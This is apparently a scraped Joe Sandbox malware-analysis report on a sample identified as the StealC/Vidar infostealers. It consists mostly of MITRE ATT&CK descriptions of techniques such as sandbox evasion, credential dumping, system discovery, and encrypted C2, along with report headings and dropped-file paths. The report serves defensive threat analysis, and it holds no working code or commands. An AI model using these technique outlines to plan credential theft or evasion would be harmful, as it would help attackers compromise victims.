Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HrxOpVxK5d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BAFIEGIECGCBKFIEBGCA

C:\ProgramData\EBFBKKJE

C:\ProgramData\FBGHIIJDGHCBFIECBKEG

C:\ProgramData\FIDGDAKFHIEHJKFHDHDBGIIDAE

C:\ProgramData\GHJJDGHCBGDHIECBGIDAEHCGDG

C:\ProgramData\IIJEBFCFIJJJEBGDBAKE

C:\ProgramData\JJJJKEHC

Windows Analysis Report
HrxOpVxK5d.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre